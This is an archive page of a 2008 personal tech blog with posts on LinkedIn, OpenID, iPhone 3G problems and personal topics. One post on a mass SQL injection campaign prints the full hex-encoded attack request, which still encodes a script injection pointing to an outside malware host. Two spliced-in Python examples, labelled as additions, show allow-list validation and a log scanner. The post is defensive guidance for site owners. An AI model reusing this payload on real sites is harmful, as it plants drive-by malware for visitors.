Friday, 29 August 2008

As mentioned the other day, LinkedIn today released their new Groups features. Groups are one of the most popular features on LinkedIn, despite the limited feature-functionality provided for groups on the web site in the past.

The new features include a searchable contacts roster (search by name, company, or other keywords such as specific areas of expertise), which is accessible to all members; and discussions with email-digest notifications (which are configurable by individual group members). A few screen clips of the new functionality are shown below, and LinkedIn has published an informational page describing the new functionality.

Notification when you sign in that your managed group now has new features:


The new tabs available reflect the new functionality:


Choose your notification email delivery preferences for discussions:


Write a new discussion topic for the group:


Recent discussions list:




Tech
Friday, 29 August 2008 01:08:33 (Pacific Standard Time, UTC-08:00)

Vidoop Labs has a dream:

The dream is to see Identity baked into all browsers. Just imagine opening your web browser and then selecting your Identity Provider (IDP) the way you select your default search provider. The benefits are numerous; never type in a username, never look for a login button/page (you are authenticated when you land on a domain), no phishing/MITM (the browser can do domain and SSL cert validation). You fire up your browser and authenticate (or login) similar to the way you log in to your computer every time you turn it on. The difference is you get to choose your provider and can take control of the data you safeguard, store and share on the Internet.

I could get into that.

Vidoop is a Portland, Oregon company that has built some interesting technology around OpenID. I really like the idea of OpenID, and I have a couple OpenIDs of my own that I use on various sites. But OpenID is not exactly perfect. It's still relatively young, and from the usability standpoint it needs improvement. The identity and authentication requirements of the modern Internet demand some additional features and capabilities that OpenID doesn't deliver (and you can argue that it shouldn't). By combining OpenID with other technologies (such as Information Cards and other strong-auth offerings) and improving usability for end-users, it could become a widely-adopted, used and trusted standard, or part of a broader one covering strong authentication and identity protection/assertion in a commonly-accepted and deployed package.

Vidoop's Luke Sontag today posted an announcement that the company's newly-formed Vidoop Labs has fired up a community project called IDIB (pronounced "Eye-Dib"), which aims to improve on the OpenID usability model and make it stronger at the same time. They've released a developer preview of IDIB in hopes of involving people and getting your input and feedback.

From the Vidoop announcement:

Over the past few years we’ve seen the adoption of OpenID continue to increase but the work that we’ve done as a community to develop this technology has only just begun. Looking at the landscape of OpenID adoption, it's clear that there are several key factors inhibiting adoption, but two that we want to focus on today, namely usability and security in the browser.

It was almost two years ago when the Firefox 3.0 roadmap was announced and OpenID was mentioned as a new component to the platform. The Mozilla Firefox team looked to members of the OpenID community to step up and provide guidance on what exactly we imagined identity in the browser looking like, but we failed to mobilize and answer their call.

In light of that missed opportunity, Vidoop Labs has been working hard over the last several weeks to produce a prototype that we intend to use to initiate a wider discussion about OpenID in the browser and what it might look like.

And the current developer preview (which is open-source) is just a beginning. Imagine leveraging Information Cards (such as one would use with Microsoft's CardSpace, or the similar open-source offerings for Mac and Linux) in the cloud, and being able to use OpenID - one logon for all your web sites - confidently, securely and with proper security protection.

The Internet needs a good, strong, reliable, usable and secure standard technology to solve the issues related to user names, passwords, single sign on and identity protection. IDIB looks like a serious and positive attempt to start the journey directly down that path.



IT Security | Tech
Thursday, 28 August 2008 23:18:19 (Pacific Standard Time, UTC-08:00)
 Thursday, 28 August 2008

I thought I'd present some casual observations I made throughout the day Wednesday on a trip from Portland to Seattle, as well as some newly reported information about the AT&T 3G network that's hit the 'net over the past 24 hours or so.

The back-story here is that I - like many others - have found the reliability and consistency of the iPhone 3G to be less than satisfactory while on the 3G AT&T network.

First of all, it became clear to me over the course of several hours yesterday that the iPhone is not to blame with regards to connectivity on the 3G network. While driving from Portland, Oregon to Seattle, Washington and back yesterday, I had the opportunity to run a whole slew of speed/connectivity test sessions using the iPhone app called "iNetwork Test" (click here to get the free app in the iTunes App Store).

AT&T actually has fairly impressive 3G network coverage from south of Olympia, Washington practically all the way to Seattle, with one or two small gaps in-between where the phone switched to EDGE. Much of the area along that I-5 corridor is rural or sparsely-populated. From a wireless connectivity standpoint, it's a pretty decent area to live in if you're going to be far away from the city.

My experience in using the 3G network along my drive up and down the Interstate can be summed up thusly:

In areas with higher population density, and thus more iPhone (and other device) users, ability to a) connect to the voice network and make calls, b) stay connected to the voice network, c) make data connections and d) maintain data connections was substantially worse. The difference between dense and sparsely populated areas was like night and day.

Where population density was lower, even in cases when fewer bars are displayed on the signal strength icon, voice and data connections were reliable and solid without exception. In contrast, in high-population areas even full-signal connectivity was spotty and unreliable.

I'm running the latest iPhone software, v2.0.2, which both Apple and AT&T have encouraged people to upgrade to. AT&T even sent a text message to all users asking them to upgrade - a first-time action on the part of the carrier.

Some new information, part of which you'll find quoted below, helps explain why I experienced substantially poorer performance in the cities and heavily-populated areas but not in the rural sections of my drive. According to reports, it appears AT&T's 3G radio systems are power-constrained, and are not able to maintain all the connections. The incredible number of iPhone 3G devices on the network - especially in metropolitan and urban areas - is most certainly placing a heavy load on the radios. In addition, iPhone 3G devices that have not been updated to the v2.0.2 software are placing an even heavier burden on the radios from a power-consumption standpoint.

So, there's a power-management problem, as well as a capacity problem. When the network "noise" in the radio spectrum used gets to be higher, the towers have to increase power to try to overcome the noise. You can see how that doesn't work. Eventually the noise keeps climbing and the power consumption at the tower (and presumably on the iPhone as well) goes through the roof.

More towers would increase capacity, reduce power requirements and resulting noise, and generally improve coverage. But that's not something that can be changed overnight.

All of this helps explain why my ability to make calls, connect to the 3G data network and download at high speeds was much better where the network is only lightly used.

The Daily Tech site has a detailed report (and some intelligent reader comments) that describes the cell-site power issues, the problems related to the older iPhone 3G software, and other items. Go to the Daily Tech site to get all the details. Here is a portion of the information, including some text quoted from Roughly Drafted Magazine, whose author was able to get some new details from a source inside AT&T's wireless business describing the power issues and what the iPhone's v2.0.2 software update changes:

Basically the update "fixed power control on the mobile" according to the source. To understand what they're going to say next, you must first know a bit about AT&T's jargon for UMTS -- the technology it uses to deliver its 3G network. In the technology, phones are referred to as user equipment, "UE" for short. The base transceiver station towers are known as "Node B".

With this jargon in mind, the AT&T source explains:
"In UMTS power control is key to the mobile and network success. If the UE requires too much downlink power then the base station or Node B can run out of transmitter power and this is what was happening. As you get more UEs on the cell, the noise floor rises and the cell has to compensate by ramping up its power to the UEs. If the UE power control algorithm is faulty then they will demand more power from the cell than is necessary and with multiple users this can cause the cell transmitter to run out of power. The net result is that some UEs will drop their call. I have seen the dropped call graphs that correspond to the iPhone launch and when the 2.0.2 firmware was released. The increase in dropped calls, (were the result of) dropped calls due to a lack of downlink power."
In essence, the iPhone is asking for a stronger signal than it needs. In areas with lots of users, some or all of whose phones are doing this, calls start to get dropped and signal quality drops. This all follows with the conclusions the media had reached -- the problems were somehow correlated to user distribution and seemed puzzlingly to be both with AT&T's network, and with the hardware.

The source continues:
"The power control issue will also have an effect on the data throughput, because the higher the data rate the more power the Node B transmitter requires to transmit. If the UEs have poor power control and are taking more power than is necessary then it will sap the network’s ability to deliver high speed data. This is one of the reasons why AT&T has been sending text messages to users to persuade them to upgrade to the 2.0.2 software. In a mixed environment where users are running 2.0, 2.0.1, and 2.0.2, the power control problems of 2.0 and 2.0.1 will affect the 2.0.2 users. It is not the network that is at fault but the interaction of the bad power control algorithm in 2.0 and 2.0.1 software and the network that is at fault. The sooner everybody is running 2.0.2 software the better things will be. Having seen the graphs the 2.0.2 software has already started to make a difference."
Since transmitting lots of data takes lots of transmission power, and transmission power was unnecessarily being raised above that necessary for the use levels on phones, the network in areas of heavy use was unable to handle high speed data.


Apple | Mobile | Tech
Thursday, 28 August 2008 18:21:35 (Pacific Standard Time, UTC-08:00)

My first-generation Nikon D70, which I bought the day it was released to the market a few years back, died on me a few months ago. Without a card in it, it won't start, and when you insert a CF card in the slot, the green data-access indicator flashes on and off. If I hold down the Menu button, the menu flashes on and off along with the green LED.

As it turns out, this is a known problem with the original Nikon D70 cameras, and Nikon USA has a service bulletin out on the camera body. They'll repair it free of charge.

So, if you have the same problem, visit this service bulletin page, click on the D70, and you can access a PDF file that you'll need to print, fill out and send to Nikon along with your camera body. Be sure to take your camera strap off and remove the battery, and don't send any lenses or other accessories.

Mine's on its way to Nikon now - they say the turnaround is five days (plus shipping time).



Photography | Tech
Thursday, 28 August 2008 15:51:59 (Pacific Standard Time, UTC-08:00)
 Wednesday, 27 August 2008
Well, this is a little embarrassing. Intergalactic malware has made its way into the news. A computer virus on the International Space Station. No AV software on the laptops they use, nor (apparently) is there a process of security checks on personal computer equipment like USB thumb drives carried by astronauts being rocketed to the International Space Station.

Granted, the virus in question in this case is pretty innocuous, and apparently other viruses that have made it into space aboard computer gear in the past (it's really quite difficult to mention that in passing) have also been more of an inconvenience than a real security threat.

But imagine a virus that might make its way on-board and do more damage. Not good. It looks like it's time for some effective process and possibly some basic security technology - You know, just in case.

The author of that virus has something new to brag about, though. That's for sure.



IT Security | Tech
Wednesday, 27 August 2008 20:01:30 (Pacific Standard Time, UTC-08:00)
Now and then I think back to an old song, a not-quite-as-old television commercial, and a little league baseball "career" that happened years before. In each of our lives there's that song, that toy, that event, or what have you - Something from our past that somehow pulls us back, and returns our minds directly into a piece of our past that has some real meaning.

For me, one of those timeless reminders is a song and a Pizza Hut commercial from the early 90's. I recall seeing the commercial on TV, and it's on the old VHS video tape of the first Teenage Mutant Ninja Turtles movie. The song is called "Right Field," and it was originally performed by Peter, Paul and Mary (here's an iTunes link for ya). I'm not sure who's singing in the Pizza Hut commercial, but the combination of the visuals and the music is priceless, and it just takes me back.

I think when I was much younger, I even looked a bit like that kid. Maybe a somewhat skinnier head, but close. Watching that commercial truly takes me back. I wasn't a great baseball player by any stretch of the imagination, but I truly enjoyed the game. I remember taking a couple fast pitches to the face, and standing in right (or left, or center) field, the ball high in the air and coming down at me. I was always at least a little amazed when it landed in my glove. I remember my best friends with me on the team and out on the field. The cottonwood fluff floating in the air, just like in the commercial. Lots of rubber bands, oil and a ball wrapped in a new glove, crammed under the truck tire overnight. And I remember, quite clearly, our dads (who were also our coaches) taking us to -- you guessed it -- the local Pizza Hut after games, where we pigged out (that's the term we used back then), belched a lot of soda bubbles, and generally had a great time. I remember playing Space Invaders and Asteroids and Missile Command on the table games there when they were brand new.

Years later as an adult, when the Pizza Hut commercial was created I remember watching it with a couple of my foster sons. It was baseball season for them, and they loved it as much as I did. Of course, the fact that it was on the beginning of the Teenage Mutant Ninja Turtles video tape helped (since they loved that, too). I was helping coach by then. When the kids weren't around, I sometimes played the commercial over and over a few times. I know it sounds weird, but like I said - Each of us has those little things that truly take us back.

A lot of people don't realize the original song is one of many great songs by Peter, Paul and Mary. I have no idea who recorded the actual music used in the commercial spot. Many people also often don't realize there are additional verses. The final verse and chorus, with a minor modification, is what they used in the commercial. That's my favorite part, but the whole song is great and I think anyone who's a fan of the song would like to hear it or read the lyrics. Here's an iTunes link. The original lyrics appear below, and I've added a bonus YouTube link -- video of PP&M performing the original song.
Saturday summers, when I was a kid
We'd run to the schoolyard and here's what we did
We'd pick out the captains and we'd choose up the teams
It was always a measure of my self esteem
'Cuz the fastest, the strongest, played shortstop and first
The last ones they picked were the worst
I never needed to ask, it was sealed,
I just took up my place in right field.
Playing...

Right field, it's easy, you know.
You can be awkward and you can be slow
That's why I'm here in right field
Just watching the dandelions grow

Playing right field can be lonely and dull
Little leagues never have lefties that pull
I'd dream of the day they'd hit one my way
They never did, but still I would pray
That I'd make a fantastic catch on the run
And not lose the ball in the sun
And then I'd awake from this long reverie
And pray that the ball never came out to me
Here in...

Right field, it's easy, you know.
You can be awkward and you can be slow
That's why I'm here in right field
Just watching the dandelions grow

Off in the distance, the game's dragging on,
There's strikes on the batter, some runners are on.
I don't know the inning, I've forgotten the score.
The whole team is yelling and I don't know what for.
Then suddenly everyone's looking at me
My mind has been wandering; what could it be?
They point at the sky and I look up above
And a baseball falls into my glove!

Here in right field, it's important you know.
You gotta know how to catch
You gotta know how to throw
That's why I'm here in right field
Just watching the dandelions grow!
A simpler time, not a worry in the world. Just a ball, a bat, a group of kids, a field and a few dandelions to distract some of us. We may never get back there in real life, but it's fun to revisit it from time to time in our minds.

I'm also reminded, strangely enough, of something that happened many years later. Several years ago I was in a conference room with my IT team, assembled as a panel to interview a candidate for a position on our IT help desk. We'd asked the common technical and background questions of the candidate, whose name was Aaron. We then threw a couple behavioral questions at him, including the classic, "Why are manhole covers round?" A semi-blank look came over Aaron's face, and after several moments he blurted out his answer: "Because Teenage Mutant Ninja Turtles like pizza???" I turned to the guy next to me and declared, "He's the guy." We hired him the next day. His other interview questions and excellent answers had a lot to do with that decision, but the pizza answer was really what made it stick for me. Anyone can answer technical questions. That answer was a classic. And for the record, he turned out to be a great hire, too.

Whether it's a song like "Right Field" or a movie ("Stand by Me" comes to mind) or something else, each of us has our memory triggers. I'm just glad YouTube has that old commercial online, so I don't have to buy a VHS player just to load up this old TMNT video tape that I still have on my shelf. I'm not even sure if it would play anymore, but one thing's for sure: I won't be getting rid of that old tape any time soon.


Personal Stories | Random Stuff
Tuesday, 26 August 2008 23:35:32 (Pacific Standard Time, UTC-08:00)
 Tuesday, 26 August 2008
LinkedIn has started sending owners of certain LinkedIn Groups email letting them know that on Friday they'll be enabling a new discussions capability for group managers and members. A friend received the information for his LinkedIn group today, but I have not yet received it for the one I co-manage, PDX Tech. So, it's not clear whether this is rolling out to all groups or just some.

The addition of this new Groups functionality is a great move. To date, people who manage LinkedIn groups have had very limited options in terms of how to enable networking and communication among their groups. One can manually export a delimited-text file in a few formats to let you send emails, but outside of that the group interaction model has been short-featured, and required use of outside services - a sloppy model at best.

In addition to the group discussions, they plan to release an enhanced, searchable membership roster capability. Earlier this summer they introduced a searchable Groups directory. Positive changes appear to be happening.

Below are the details from the LinkedIn email.

Dear #####,

First, thank you for managing your group on LinkedIn. We sincerely appreciate the time and effort you devote to your members, and we know they value it. Together you have made Groups one of the top features on LinkedIn.

This Friday, we will be adding several much-requested features to your group:
  • Discussion forums: Simple discussion spaces for you and your members. (You can turn discussions off in your management control panel if you like.)
  • Enhanced roster: Searchable list of group members.
  • Digest emails: Daily or weekly digests of new discussion topics which your members may choose to receive. (We will be turning digests on for all current group members soon, and prompting them to set to their own preference.)
  • Group home page: A private space for your members on LinkedIn.
We're confident that these new features will spur communication, promote collaboration, and make your group more valuable to you and your members. We hope you can come by LinkedIn on Friday morning to check out the new functionality and get a group discussion going by posting a welcome message.

Sincerely,
The LinkedIn Groups Team



Tech
Tuesday, 26 August 2008 19:49:08 (Pacific Standard Time, UTC-08:00)
 Monday, 25 August 2008
A couple of small, independent evaluations of the iPhone 3G's performance, which has been much maligned by many of its customers (including me from time to time), have been published in the past day or so. The results are interesting to consider, especially side-by-side.

In the first test, Swedish tech site GP took their iPhone 3G to a super-fancy antenna test chamber at a company called Bluetest, where they ran the iPhone through the highly technical paces along with a few other 3G phones for comparison purposes. Results are available on the GP site.

In the second test, Wired asked readers to participate in testing from the field, where they gathered and submitted speed and other connectivity data with their own phones. Wired then analyzed, mapped and posted the results as well as the test data in complete raw format at their site.

In the end, what did the tests yield? Well, you should read them for yourself and draw your own conclusions, of course. But in a nutshell, here's my take on what they found:
  • GP's antenna test found that the iPhone 3G's antenna performs as well as any of the other 3G phones tested.
  • The Wired real-world network test found that the networks are often woefully underperforming, and that while speeds are typically faster than EDGE, the ability to connect to a 3G tower might be problematic at best.
So, does this mean Apple-provided software fixes may not be able to solve the iPhone's 3G woes? It seems that in the case of network performance where the number of "bars" showing on 3G is at the bottom of the scale yet an EDGE network has a strong signal, trading off could be done better by the phone. But what really needs to happen to solve the big-picture problem is better 3G coverage. My experience in several cities has been that 3G coverage is poor in many cases, and inconsistent at best. In fact, if the AT&T EDGE/2.5G network was not available as a fall-back (or maybe "call-back" is a better term, given the dropped call rate), AT&T would never be able to sell their service. The effective 3G network coverage just isn't good enough to stand on its own. And poor coverage combined with all those handoffs and network drops just mean more and more battery power being applied by the device to keep re-establishing its 3G connectivity.

However, any software fixes for lockups, freezing and app crashes will require Apple taking action. One thing I've wondered lately: Are device/software hangs and crashes causing or somehow related to network connectivity issues? Could one be causing the other, at least part of the time? I have noticed locking/hanging in several apps while the iPhone tries to connect to the AT&T network (as evidenced by the simultaneous flurry of AT&T radio-speaker-dance noise that we've all become familiar with over the past several years).



Apple | Mobile | Tech
Monday, 25 August 2008 07:10:55 (Pacific Standard Time, UTC-08:00)
 Wednesday, 20 August 2008

I like to listen to my Pandora "stations" in the background while working on my laptop. I get frustrated when I accidentally close the web browser (often it's in a hidden tab) or, even worse, click on a link somewhere and Safari, in all its awesomeness and wisdomness, re-uses the window and kills the audio feed.

In hopes of finding a better way, I started searching for a Pandora widget for the Mac Dashboard (the layover-page that you can put any of a number of downloadable mini-apps on). Unfortunately, I didn't find anything. (Update - turns out there is a widget out there, but it's a memory hog and apparently has a few issues). So, rather than looking for someone else to do the work for me, I started to actually think about a solution I could build on my own.

After about 10 minutes, I remembered the nifty capability in Safari to define a "snipped" portion of a web page and make it a Widget on the OSX Dashboard. You use the little scissors icon in Safari to accomplish this. I started thinking about the Dashboard and how it works, and wondered if there was any way to have Pandora play in the background using a system (the Dashboard, that is) that appears to reload each app every time I launch it.

What the heck, worth a shot, right? Well, I found I could create a web-clip of Pandora's music player that would play my music. No big surprise there. Click on the image to see the widget full-size.


But when I exited the dashboard to go do some actual work, the music would quit.

Bummer.

I got curious though. Maybe someone had thought about the fact that web pages constantly change and play music and whatever else. I did the obvious: I clicked on the little (i) button in the lower right corner of the widget and it took me to the page where I can choose to make the widget look like it's torn from a piece of paper, or whatever. And, lo and behold, right there in the lower left, is a box that makes it appear you can uncheck it and make the audio play in the background, even when dashboard is not active. I've highlighted that box below.


Would it work? I unchecked the box, exited Dashboard, and the music kept on playing in the background. Problem solved! It turns out the default setting is to play web page audio only when Dashboard is active, so you have to toggle the setting to get what you want.

Any other ways to do this? My method works great, but I wonder if someone else came up with a different solution?



Apple | Tech
Wednesday, 20 August 2008 16:00:54 (Pacific Standard Time, UTC-08:00)
 Monday, 18 August 2008

Boy Genius says iPhone software v2.0.2 is on its way out the door this afternoon. In fact, I just checked in iTunes, and there it is.


All 248.7MB of it. The description in the iTunes UI says it contains bug fixes, and that's it. Here's hoping the performance and stability issues - especially related to 3G network performance and switching - are what they fixed in this release. I almost returned my phone the other day out of sheer frustration, and that's saying a lot, really.

Update: After a couple hours of on/off use, apps are notably more stable/snappier (at first I wondered if it was just my imagination, or a fresh restart effect - time will tell), and network performance is better. Where a 3G network with poor or broken signal would be selected before, now a strong EDGE network is selected by the phone. Apps don't seem to hang in places where they reliably (or maybe the better term would be "predictably") hung before the update. For example, the volume controls in almost every app used to not respond for periods of time. Now they work every time. Much less frustrating. There are no real changes in terms of outward appearance and functionality.



Apple | Mobile | Tech
Monday, 18 August 2008 13:47:16 (Pacific Standard Time, UTC-08:00)
 Friday, 15 August 2008

I just made a change on the blog, so my main RSS feed links now point to FeedBurner. You should not need to do anything to use the new feed - it's automagical. As a result of this change, some people might see duplicates of past entries. It's a one-time change (I hope), so thanks for putting up with it.

If you happen to subscribe to the feed for any single posting category here, that feed URL is unchanged.



AudioBlogging | Random Stuff | RSS Stuff
Friday, 15 August 2008 08:49:24 (Pacific Standard Time, UTC-08:00)
 Wednesday, 13 August 2008

My knowledge and social integrity were called into question this evening (in an instant messaging group chat session) about a rule-related fact I declared to be true based on the Rules of Jinx. I've always considered the rules to be pretty straightforward, and we all know they are unflinchingly rigid, but I'm willing to accept that evidence is the best proof when someone questions you.

And what better evidence than an encyclopedia of "facts" made up by pretty much anyone who says they know what they're talking about? I went to Wikipedia, and the entry there about the rules of Jinx. I'm posting a portion of it here for easy future reference.

A jinx can be initiated when at least two people in casual conversation unintentionally say (or type, in the case of Internet jinx) the same word or phrase at the same time. If one of them (the "jinxer") yells "Jinx!" before any further conversation has begun, the other person (the "jinxee") is in a state of being "jinxed" and may not speak further until they are "released" from the jinx. The rules for what constitutes such a release vary. Traditionally, a jinx is ended when anyone speaks the jinxed person's name. However, a common variation says that only the jinxer can free the jinxee from their obligation to remain silent. (This is sometimes called a "private jinx" or "jinx personal lock".)

The game ends when either the jinxee is released from the jinx or when the jinxee "breaks" the jinx by speaking while in a state of being jinxed. In the latter case, the Jinxee loses the game and a penalty is exacted.

Simultaneous speaking that is planned or expected, such as during the recitation of the Pledge of Allegiance or during the singing of a song, is ineligible for a jinx to occur. A jinx may only follow a spontaneous and unexpected overlapping of conversation by both parties.

See the Wikipedia article for penalties, variations and details about the Jinx Sequence.

Okay. Back to your regularly scheduled programming, already in progress...



Humor | Random Stuff
Wednesday, 13 August 2008 22:58:50 (Pacific Standard Time, UTC-08:00)
 Tuesday, 12 August 2008

A bunch of IT and web-app teams have lost a lot of sleep lately...

Over the past several days, a significant number (in the thousands) of web applications, some of them well-known and well-used, have fallen victim to a distributed SQL injection attack that takes advantage of weak or non-existent input validation to inject malicious HTML code that then performs a drive-by malware attack on unsuspecting visitors. Since visitors to your site trust it, if your site has been hacked they are more likely to allow the malware to install on their computer (especially if, for example, the malware is delivered in the form of a browser helper object or something along those lines).

The malware in question appears to steal WoW account information and insert a back-door (trojan) program on PCs it infects (among other things).

Web sites that do not properly validate all input - and by proper I mean trust nothing by default and only allow input that specifically matches what is appropriate - and which run on a Microsoft SQL Server back-end (and possibly other database servers that use the same basic table structure) are at risk. I've observed web sites running on both Apache and IIS that have been hacked; the only common thread is SQL Server (despite reports to the contrary).

About data validation...

I've personally spoken with people from a few companies who have had to contend with the fact that their sites were attacked in this manner over the past several days. In each case, they were utilizing a so-called "black-list" (or "deny-list" to be a little more appropriate) of bad input in their application logic. The problem with black-listing is that it fails whenever you don't realize something should be on the list, or when new threats emerge. A white-list (or "allow-list") methodology instead requires you to specify what input is allowed. Your application won't change much over time. The threats will. Deny all by default; it's the only safe way to go.

UPDATE: Neil Carpenter mentions in the comments here that he recently posted an excellent blog entry about using parameterized queries in SQL Server, and he makes some great points. While input validation is a useful and often appropriate layer of security (not all apps are database-driven), solving this specific type of problem using his method is an important idea to look at and leverage. A layered combination of both input validation (where it's practical and workable) and parameterized queries is a good approach, in my opinion.
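The layered approach described above, as an added example that is not code from this post or from Neil Carpenter's entry: an allow-list check in front of a parameterized query. Python's sqlite3 stands in for SQL Server, and the table, field names and patterns are hypothetical.

```python
import re
import sqlite3

# Allow-list: each accepted parameter maps to the only pattern it may match.
# Field names and patterns are hypothetical; anything not listed is rejected.
ALLOWED = {
    "id": re.compile(r"[0-9]{1,9}"),
    "category": re.compile(r"[a-z][a-z0-9-]{0,31}"),
}

class RejectedInput(ValueError):
    pass

def validate(params):
    """Return params only if every key and every value is on the allow-list."""
    for key, value in params.items():
        pattern = ALLOWED.get(key)
        if pattern is None or not pattern.fullmatch(value):
            raise RejectedInput(key)
    return params

def make_db():
    """Build a small in-memory table with constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, category TEXT, title TEXT)")
    db.executemany("INSERT INTO articles VALUES (?, ?, ?)",
                   [(1, "news", "Launch day"), (2, "how-to", "Log review")])
    return db

def titles_in_category(db, category):
    # The value is bound as a parameter, so it reaches the database as data
    # and is never parsed as part of the SQL statement text.
    rows = db.execute("SELECT title FROM articles WHERE category = ? ORDER BY id",
                      (category,))
    return [row[0] for row in rows]

def handle_request(db, params):
    """Layer 1 (allow-list), then layer 2 (bound parameter). Returns (status, titles)."""
    try:
        category = validate(params)["category"]
    except (RejectedInput, KeyError):
        return 400, []
    return 200, titles_in_category(db, category)

# Constructed input shaped like the start of the request quoted in this post.
HOSTILE = "';DECLARE @S CHAR(4000);"
```

Either layer alone stops this input; with both in place, a gap in one is covered by the other.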

The attack

Secure Computing's TrustedSource (good site, read it) has some detail about the attack...

You'll see this in your web server logs (assuming you are logging, and you sure as heck better be - more on that later):

GET /?';DECLARE%20@S%20CHAR(4000);SET%20@
S=CAST(0x4445434C41524520405420766172636
8617228323535292C40432076617263686172283
430303029204445434C415245205461626C655F4
37572736F7220435552534F5220464F522073656
C65637420612E6E616D652C622E6E616D6520667
26F6D207379736F626A6563747320612C7379736
36F6C756D6E73206220776865726520612E69643
D622E696420616E6420612E78747970653D27752
720616E642028622E78747970653D3939206F722
0622E78747970653D3335206F7220622E7874797
0653D323331206F7220622E78747970653D31363
729204F50454E205461626C655F437572736F722
04645544348204E4558542046524F4D202054616
26C655F437572736F7220494E544F2040542C404
3205748494C4528404046455443485F535441545
5533D302920424547494E2065786563282775706
4617465205B272B40542B275D20736574205B272
B40432B275D3D5B272B40432B275D2B2727223E3
C2F7469746C653E3C736372697074207372633D2
2687474703A2F2F73646F2E313030306D672E636
E2F63737273732F772E6A73223E3C2F736372697
0743E3C212D2D272720776865726520272B40432
B27206E6F74206C696B6520272725223E3C2F746
9746C653E3C736372697074207372633D2268747
4703A2F2F73646F2E313030306D672E636E2F637
37273732F772E6A73223E3C2F7363726970743E3
C212D2D272727294645544348204E45585420465
24F4D20205461626C655F437572736F7220494E5
44F2040542C404320454E4420434C4F534520546
1626C655F437572736F72204445414C4C4F43415
445205461626C655F437572736F72%20AS%20CHA
R(4000));EXEC(@S);HTTP/1.1

Which is a hex-encoded injection that, when translated, creates this SQL statement string (bad-guy address has been removed):

DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C +']=['+@C+']+''">

To search your web server logs for any offending lines, look for "DECLARE" anywhere in the query string. That's a dead give-away. You'll find attacks from various unsurprising countries including North Korea and China (or at least that's where I have seen them coming from).
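The log search described above, as an added example that is not part of the original post: it URL-decodes each request's query string, flags DECLARE, and decodes any CAST(0x... AS CHAR) value so the SQL can be read during triage, which goes one step beyond the plain keyword search. The log lines, addresses and hex value are constructed, and the "high"/"review" labels are this example's own.

```python
import re
from urllib.parse import unquote

# Constructed sample log (documentation-range addresses). The hex value is
# just "SELECT 1", standing in for the much longer blob seen in real requests.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Aug/2008:10:01:00 -0800] "GET /index.html HTTP/1.1" 200 5120
198.51.100.7 - - [12/Aug/2008:10:01:03 -0800] "GET /?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x53454C4543542031%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 5120
203.0.113.4 - - [12/Aug/2008:10:02:11 -0800] "GET /search.asp?q=declare+independence HTTP/1.1" 200 812
"""

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+)')
DECLARE = re.compile(r"\bDECLARE\b", re.I)
HEX_CAST = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+N?(?:VAR)?CHAR", re.I)

def scan_line(line):
    """Return a finding dict if the query string contains DECLARE, else None."""
    match = REQUEST.search(line)
    if not match:
        return None
    path, _, query = match.group(1).partition("?")
    decoded = unquote(query)  # %20 -> space, so keywords become matchable
    if not DECLARE.search(decoded):
        return None
    finding = {"client": line.split(" ", 1)[0], "path": path,
               "confidence": "review", "decoded_sql": None}
    cast = HEX_CAST.search(decoded)
    # DECLARE alone can be an ordinary search term; DECLARE together with a
    # hex CAST or EXEC( is the shape of the request quoted in this post.
    if cast or "EXEC(" in decoded.upper():
        finding["confidence"] = "high"
    if cast and len(cast.group(1)) % 2 == 0:
        # Single-byte decode for reading only; nothing here is executed.
        finding["decoded_sql"] = bytes.fromhex(cast.group(1)).decode("latin-1")
    return finding

def scan(lines):
    """Scan an iterable of access-log lines and return all findings."""
    return [finding for finding in map(scan_line, lines) if finding]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(finding)
```

The third sample line shows why a bare keyword match needs a second look: an ordinary search for the word "declare" is flagged for review rather than treated as an attack.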

How to solve?

First of all, if code like this can get through the web application and into the database, I'd recommend a complete review of the web app from a security standpoint. Basic best-practices for web applications assume that you will trust absolutely no input by default, and then examine all input to see if it is in a format and of a type that is appropriate. And it's very important to recognize that by "input" we mean any type of input vector - whether it be form fields, query string, URI, session data, etc. Input validation should be done on the server side, not just the client side (turning off JavaScript and manipulating data en-route to the server is pretty easy, after all).

If you need a tactical approach to block this particular threat right now while you plan validation improvements, I'd recommend what many people are doing: Monitor all the input with your web server, and re-write the offending statements to something innocuous. That's a band-aid, but it can help in the short-term with this one particular need. In addition, you could use application-layer firewalls in front of your web server/farm to do the same thing. But neither of these approaches would be considered acceptable as a complete or permanent solution. You can certainly keep them in place after an app fix, as part of a layered security approach. But ultimately the site needs to be coded properly and not allow the bad input.

HP recently released a tool called Scrawlr that you can use to check specifically for SQL injection vulnerabilities. You can find it, and related information, here.

Scrawlr, developed by the HP Web Security Research Group in coordination with the MSRC, is short for SQL Injector and Crawler. Scrawlr will crawl a website while simultaneously analyzing the parameters of each individual web page for SQL Injection vulnerabilities. Scrawlr is lightning fast and uses our intelligent engine technology to dynamically craft SQL Injection attacks on the fly. It can even provide proof positive results by displaying the type of backend database in use and a list of available table names. There is no denying you have SQL Injection when I can show you table names!

If you are dealing with this attack or have related thoughts, please feel free to post in the comments with your experiences.



IT Security | Tech
Tuesday, 12 August 2008 14:24:30 (Pacific Standard Time, UTC-08:00)


There are a lot of so-so iPhone apps out there, fun to use once or twice but not killer applications that you simply must have. DataCase is a candidate for that latter classification. (Available via the app store for iPhone and iPod Touch, $6.99)

The DataCase app allows you to copy files from your PC or Mac to the iPhone via the wireless network using a drag-and-drop method. Once on the iPhone you can view and use the files in mobile mode. There's support for MS Office formats, PDF, text, common images, HTML, plus any audio and video the iPhone OS would normally support.

It's pretty slick. I'm playing with it now and can see the real benefits of having a variety of key files, documents, etc. available on the mobile device any time I need them. One problem common to all iPhone apps is the fact that it has to be running in the foreground in order to access the app remotely - no background execution. Good thing I bought this 16GB iPhone eh?

Links: Veiosoft web site and a review at TUAW.





Apple | Mobile | Tech
Tuesday, 12 August 2008 13:02:49 (Pacific Standard Time, UTC-08:00)
